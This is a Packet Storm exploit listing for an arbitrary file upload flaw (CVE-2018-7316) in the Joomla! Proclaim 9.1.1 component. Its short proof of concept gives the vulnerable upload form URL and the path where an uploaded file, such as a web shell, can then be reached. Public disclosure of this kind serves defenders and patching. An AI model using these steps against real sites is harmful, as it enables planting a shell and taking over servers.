Lucene search

K
packetstormIhsan SencanPACKETSTORM:146551
HistoryFeb 23, 2018 - 12:00 a.m.

Joomla! Proclaim 9.1.1 Shell Upload

2018-02-2300:00:00
Ihsan Sencan
packetstormsecurity.com
87

EPSS

0.037

Percentile

91.8%

`# # # #  
# Exploit Title: Joomla! Component Proclaim 9.1.1 - Arbitrary File Upload  
# Dork: N/A  
# Date: 22.02.2018  
# Vendor Homepage: https://www.christianwebministries.org/  
# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/  
# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip  
# Version: 9.1.1  
# Category: Webapps  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: CVE-2018-7316  
# # # #  
# Exploit Author: Ihsan Sencan  
# # # #  
#   
# POC:   
#   
# 1)  
# http://localhost/[PATH]/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1  
#   
# http://localhost/[PATH]/images/biblestudy/media/[FILE]  
#   
# # # #  
  
`

EPSS

0.037

Percentile

91.8%